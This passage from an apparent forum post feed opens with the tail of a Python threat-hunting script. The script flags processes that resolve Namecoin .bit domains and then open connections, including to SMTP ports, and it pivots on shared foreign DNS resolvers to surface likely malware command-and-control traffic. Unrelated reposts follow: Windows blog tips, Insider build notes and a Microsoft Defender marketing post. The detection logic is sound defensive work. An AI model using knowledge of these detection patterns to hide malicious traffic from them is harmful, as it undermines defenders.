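                foreign_resolvers.add(ev["remote_ip"])
            if is_bit_domain(ev["query"]):
                findings[pid].add("bit_domain_lookup")
                pids_with_bit_lookup.add(pid)
        elif ev["kind"] == "connect" and pid in pids_with_bit_lookup:
            # Connections that follow a .bit lookup are the resolved C&C traffic
            # seen in the alert process tree; SMTP use is a further indicator.
            findings[pid].add("connection_after_bit_lookup")
            if ev["remote_port"] in SMTP_PORTS:
                findings[pid].add("smtp_after_bit_lookup")
    return {p: sorted(r) for p, r in findings.items()}, foreign_resolvers


def processes_using_resolvers(events, resolvers):
    """Pivot: every (pid, image) that sent DNS queries to any of the given servers."""
    return sorted({(e["pid"], e["image"]) for e in events
                   if e["kind"] == "dns" and e["remote_ip"] in resolvers})


if __name__ == "__main__":
    found, foreign = hunt_namecoin(SAMPLE_EVENTS)
    for pid, reasons in found.items():
        print(pid, reasons)
    print("pivot:", processes_using_resolvers(SAMPLE_EVENTS, foreign))
```

The pivot output is the point of the Figure 13 hunt: svchost.exe never touched a .bit name, yet it used the same foreign resolver and is therefore worth a look.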
  11. It works very well. I also installed the other addon referenced in the article and set up Twitter and a couple other sites in their own container.
  12. Probably will save them millions if not more. Purely a business decision.
  13. Write and draw even more naturally

Using a pen feels natural with tilt* support, letting you draw and shade just like you would with paper and pencil. Simply select the Pencil tool, angle your pen slightly, and watch as your ink stroke changes from a point to a more natural angle.

Draw with dazzling ink

Spice up your notes and sketches with fun ink effects** like rainbow, galaxy, gold, silver, lava, ocean, and more.

Clean up your notes

OneNote lets you convert your handwritten notes into text, making them more presentable and easier to read. It’ll even preserve the size and color of your ink, as well as highlights and ink effects like rainbow and galaxy!

Set things straight with the ruler

Can’t draw a straight line to save your life? Don’t worry. With the new digital ruler, drawing a perfectly straight line is a breeze.

Solve and graph handwritten math equations

Improve your math skills with the Ink Math Assistant**. OneNote can solve math equations and show you the steps to find the answer. It can even graph the equation and calculate the minima, maxima, or axes intercepts. If you’d like to convert the equation to typed text, it can do that too.

OneNote comes free with Windows 10, so you can start using it today. The app is updated every month with new features and improvements, so let us know via the Feedback Hub or UserVoice if there’s something you’d like to see added in the future.

*Tilt functionality available on select devices at launch.
**Requires Office 365

The post Windows 10 Tip: Five expert tips to help you master ink in OneNote appeared first on Windows Experience Blog. Continue reading...
  14. No problem. I was out most of the weekend too.
  15. Thanks Cindy. Also welcome back Cindy.
  16. Even if you get them from Google in the Android app store you'll still be vulnerable. Apps are not checked when submitted so anything can be in them. Say what you want about Apple but not just anyone can submit an app. They make it tough for devs to get their apps listed in the app store, but what you get is good quality and clean from viruses. Not saying it's 100% perfect. You're just less likely to get anything malicious.
  17. Hello Windows Insiders!

Today, we are releasing Windows 10 Insider Preview Build 17634 (RS5) to Windows Insiders who have opted into Skip Ahead.

What’s new in Build 17634

Search is now available in Calendar for Windows 10!

Now you can find past or future events by searching for the name, location, people included or words in the event body. Events that match your search will be clearly visible on your calendar, while those that don’t will be greyed-out so you can find what you need quickly. Search will work for Outlook, Hotmail, Live and Office 365 accounts. We do not yet support searching Exchange Server, Gmail, Yahoo or other IMAP calendars.

Cortana Show Me now supports voice queries

Last week, we introduced Cortana Show Me, a preview app designed to show you around Windows 10 settings. We’re here with some updates to try – you can now launch the app through voice queries. Simply say to Cortana, “Show me how to change my background,” and you’ll get the previous help results, with a new “Let’s go” button below, which launches the guided help experience. Everything else is the same as last week – the app is available in English (US and Great Britain) and in German, and there are 15 settings guides. While most Insiders don’t need pointers like this, it’s for all the friends and family we have who need a pointer – please share it with them. You can download Cortana Show Me from Microsoft Store.

Note: If you’re using keyboard navigation with your device, you will need to use Alt + Tab to move between Settings and Cortana Show Me.

Here are some voice queries to try:

Update Windows – Try, “Update my Windows device”
Check if an app is installed – Try, “How to see what apps are installed”
Uninstall an app – Try “How to uninstall apps”
Change your desktop background – Try, “Show me how to change my background”
Use Airplane Mode – Try, “How do I turn on airplane mode”
Change your display brightness – Try, “Show me how to change my screen brightness”
Add nearby printers or scanners – Try, “How to add a printer”
Turn off Windows Defender Security Center – Try, “Show me how to turn off Windows Defender Security Center”
Change Wi-Fi settings – Try, “Show me how to change Wi-Fi network”
Change your power settings – Try, “How to change when my computer goes to sleep”
Discover Bluetooth devices – Try, “Show me how to discover devices”
Check your version of Windows – Try, “How do I find my current version of Windows”

General changes, improvements, and fixes for PC

We fixed an issue where typing in the Microsoft Edge URL bar immediately after opening a new tab might result in the letters appearing in an unexpected order.
We fixed an issue where, when opening .html or .pdf files from the local system (double-click, right-click > open), Microsoft Edge would not render the loaded content if Microsoft Edge wasn’t already running before opening the file.
We fixed an issue where PDFs displayed using Microsoft Edge would shrink after refreshing the page when using a DPI scaling > 100%.
We fixed an issue that could result in Microsoft Edge crashing when turning off certain extensions.
We fixed an issue resulting in Task Manager not showing the application title in the process name for open Visual Studio projects.
We fixed an issue resulting in the UAC dialog potentially not rendering correctly in the last few flights.
We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights.
We fixed an issue where the Emoji Panel would close after typing an accent in certain languages.
We fixed an issue resulting in focus being lost after using WIN+A to close the Action Center.

Known issues

If you open Settings and click on any links to the Microsoft Store or links in tips, Settings will crash. This includes the links to get themes and fonts from the Microsoft Store, as well as the link to Windows Defender.
On resuming from sleep, the desktop may be momentarily visible before the Lock screen displays as expected.
When a Movies & TV user denies access to its videos library (through the “Let Movies & TV access your videos library?” popup window or through Windows privacy settings), Movies & TV crashes when the user navigates to the “Personal” tab.

REMINDER: Sign up to be an Office Insider!

Our friends on the Office team want to reiterate their invitation for Windows Insiders to participate in feedback and product usage which will inform the next generation of Office innovations! Windows and Office are continually looking for the best-connected experiences. Your feedback is extremely valuable to us and will help us to understand customer needs and scenarios and to prioritize our investments in the coming months. Please join the Office Insider Program to help directly affect product design decisions!

No downtime for Hustle-As-A-Service,
Dona

The post Announcing Windows 10 Insider Preview Build 17634 for Skip Ahead appeared first on Windows Experience Blog. Continue reading...
  18. That I'm unsure of although I would think not. I know when I installed it on Windows 7 it gave me a warning that I should uninstall any other AVS. It did work well with MalwareBytes.
  19. Hello Windows Insiders!

Today, we are releasing Windows 10 Insider Preview Build 17133 (RS4) to Windows Insiders in the Fast ring.

Just like in Build 17128, you will also notice that the watermark at the lower right-hand corner of the desktop has disappeared in Build 17133. Again, we are in the phase of checking in final code to prepare for the final release.

General changes, improvements, and fixes for PC

We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights.
We fixed an issue resulting in not being able to change the display resolution when there were 4 or more monitors connected, due to the confirmation prompt hanging when you selected “Keep changes”.
We fixed an issue where clicking suggested search terms when typing in the Microsoft Edge URL bar didn’t do anything.

Known issues

There are currently no major known issues for this flight; however, if any issues are discovered based off Insider feedback, we’ll add them here.

No downtime for Hustle-As-A-Service,
Dona

The post Announcing Windows 10 Insider Preview Build 17133 for Fast appeared first on Windows Experience Blog. Continue reading...
  20. Yes it will. I used it when I had Windows 7 as my OS and it worked well. In fact since it was released I used it.
  21. We’ve shown you how to clear your workspace in two simple steps and three ways you can personalize your desktop with fun themes and colors – today, we’re going to show you six keyboard shortcuts to help you easily find what you’re looking for!

Find apps, files and more on your PC
Press the Windows logo key and type the name of whatever you want to find in the search box.

Easily search Settings
Press Windows logo key + I, then search for the setting you’re looking for.

Switch between open windows
Hold down the Alt key and keep pressing Tab until the window you want is selected. Then, release the Alt key.

Add a touch keyboard shortcut to the taskbar
Right-click on the taskbar, and then select Show touch keyboard button.

Get to your desktop quickly
Press Windows logo key + D to minimize all your open windows and go right to your desktop.

Open File Explorer
Press Windows logo key + E, then open the folder you want in File Explorer.

In case you missed it, check out last week’s tip on how to view 360° videos and photos in Microsoft Edge with your Windows Mixed Reality headset!

The post Windows 10 Tip: Six keyboard shortcuts to help you find what you’re looking for appeared first on Windows Experience Blog. Continue reading...
  22. I went with two ASUS RT-AC86U routers to replace the two I have. They can function as mesh routers. My son suggested them. Should be a good upgrade.
  23. Statistics about the success and sophistication of malware can be daunting. The following figure is no different:

Approximately 96% of all malware is polymorphic, meaning that it is only experienced by a single user and device before it is replaced with yet another malware variant. This is because in most cases malware is caught nearly as fast as it’s created, so malware creators continually evolve to try and stay ahead.

Data like this hammer home how important it is to have security solutions in place that are as agile and innovative as the attacks. The type of security solution needed has a complex job: It must protect users from hundreds of thousands of new threats every day and then it must learn and grow to stay ahead of the next wave of attacks. The solution cannot just react to the latest threats; it must be able to predict and prevent malware infections.

Over the last year, we’ve talked about how we’re investing in new innovations to address this challenging threat landscape, what we’ve delivered, and how it will change the dynamics. Today, I want to share the results of our new antivirus capabilities in Windows Defender Advanced Threat Protection (ATP), which are genuinely incredible because they will directly benefit the work you are doing. Currently, our antivirus capabilities on Windows 10 are repeatedly earning top scores on independent tests, often outperforming the competition. This performance is the result of a complete redesign of our security solution. What’s more, this same technology is available for our Windows 7 customers as well, so that they can remain secure during their transition to Windows 10.

It started back in 2015

We’ve been working to make our antivirus capabilities increasingly more effective, and in 2015 our results in two major independent tests (AV-Comparatives and AV-TEST) began to improve dramatically. As you can see in the chart below, beginning in March 2015 our scores on AV-TEST began to rise rapidly, and, over the course of the next five months, we moved from scores averaging 85% on their Prevalence Test to (or near) 100%. Since then, we’ve maintained those types of scores consistently. Our scores on AV-Comparatives experienced a very similar spike, trajectory, and results.

In December 2017, we reached another milestone on AV-TEST, where we achieved a perfect score across both the Prevalence and Real-World based tests. Previously we had only scored a perfect 100% on one of the two tests for a given month. The following chart from the AV-TEST site shows our scores from November and December 2017 on Windows 7. These same scores are also applicable to Windows 10, which shares the same technology (and more).

For AV-Comparatives, we recently achieved another important quality milestone: For five consecutive months we detected all malware samples. Our previous best was four consecutive months. The AV-Comparatives chart below shows our February 2018 results where we scored a perfect 100% block rate.

While independent antivirus tests are one indicator of a security solution’s capabilities and protections, it’s important to understand that this is only one part of a complete quality assessment. For example, in the case of Windows Defender ATP (which integrates our antivirus capabilities and the whole Windows security stack), our customers have a much larger set of protection features, none of which are factored into the tests. These features provide additional layers of protection that help prevent malware from getting onto devices in the first place. These features include the following:

Windows Defender System Guard
Windows Defender Application Guard
Windows Defender Application Control
Windows Defender Exploit Guard

If organizations like AV-Comparatives and AV-TEST performed complete security stack tests (i.e., testing against the complete endpoint protection solution), the results would often tell a very different story. For example, in November, we scored a 98.9% based on a single file miss on the Real-World test. The good news, however, is that we would have scored 100% if either Windows Defender Application Guard or Application Control was enabled.

How did we achieve these results?

The short answer is that we completely redesigned our antivirus solutions for both Windows 7 and Windows 10 from the ground up. To do this, we moved away from using a static signature-based engine that couldn’t scale due to its dependence on constant input from researchers. We’ve now moved to a model that uses predictive technologies, machine learning, applied science, and artificial intelligence to detect and stop malware at first sight. We described the use of these technologies in our recent posts on Emotet and BadRabbit, as well as the recent Dofoil outbreak. These are the types of approaches that can be very successful against the ongoing avalanche of malware threats.

Because of these changes, our antivirus solution can now block malware using local and cloud-based machine learning models, combined with behavior, heuristic, and generic-based detections on the client. We can block nearly all of it at first sight and in milliseconds! This is incredible.

We’ve also designed our antivirus solution to work in both online and offline scenarios. When connected to the cloud, it’s fed real-time intelligence from the Intelligent Security Graph. For offline scenarios, the latest dynamic intelligence from the Graph is provisioned to the endpoint regularly throughout the day.

We’ve also built our solution to defend against the new wave of fileless attacks, like Petya and WannaCry. To read more about how we protect against these attacks, check out the blog post Now you see me: Exposing fileless malware.

What this means to you

Each of these milestones is great, but the thing that makes us the most excited here at Microsoft is very simple: Customer adoption. Right now, we are seeing big growth in enterprise environments across all of our platforms:

18% of Windows 7 and Windows 8 devices are using our antivirus solution
Over 50% of Windows 10 devices are using our antivirus solution

These are awesome numbers and proof that customers trust Windows security. What we are seeing is that as organizations are moving to Windows 10 they are also moving to our antivirus as their preferred solution. With our antivirus solution being used on more than 50% of the Windows 10 PCs deployed in commercial organizations, it is now the most commonly used antivirus solution in commercial organizations on that platform. This usage is in commercial customers of all sizes, from small and medium-sized businesses to the largest enterprise organizations.

Over the past couple of months I’ve shared this data with multiple customers, and often I’m asked why we’ve seen such a positive increase. The answer is simple:

Our antivirus capabilities are a fantastic solution! The test results above really speak for themselves. With five months of top scores that beat some of our biggest competitors, you can be confident that our solution can protect you from the most advanced threats.

Our solution is both easier and operationally cheaper to maintain than others. Most enterprise customers use Config Manager for PC management of Windows 7 and Windows 10 security features, including antivirus. With Windows 10, the antivirus capabilities are built directly into the operating system and there’s nothing to deploy. Windows 7 didn’t include antivirus capabilities by default, but it can be deployed and configured in Config Manager. Now organizations do not have to maintain two infrastructures, one for PC management and another for antivirus. Several years ago, our Microsoft IT department retired the separate global infrastructure that was used to manage Microsoft’s antivirus solution, and now you can too! With our solution there’s less to maintain and secure.

Our solution enables IT to be more agile. On Windows 10 there’s no agent; security is built into the platform. When a new update of Windows 10 is released, you don’t need to wait for a 3rd party to certify and support it; instead, you have full support and compatibility on day one. This means that new releases of Windows and all the latest security technologies can be deployed faster. This allows you to get current, stay current, and be more secure.

Our solution offers a better user experience. It’s designed to work behind the scenes in a way that is unobtrusive to end users and minimizes power consumption. This means longer battery life, and everyone wants more battery life!

While we’ve made excellent progress with our antivirus solution, I’m even more excited about the protection and management capabilities we will deliver to our customers in the near future. In the meantime, one of the best ways to evaluate our antivirus capabilities is when you run it with Windows Defender ATP. With Windows Defender ATP, the power of the Windows security stack provides preventative protection, detects attacks and zero-day exploits, and gives you centralized management for your end-to-end security lifecycle. Sign up to try Windows Defender ATP for yourself! Continue reading...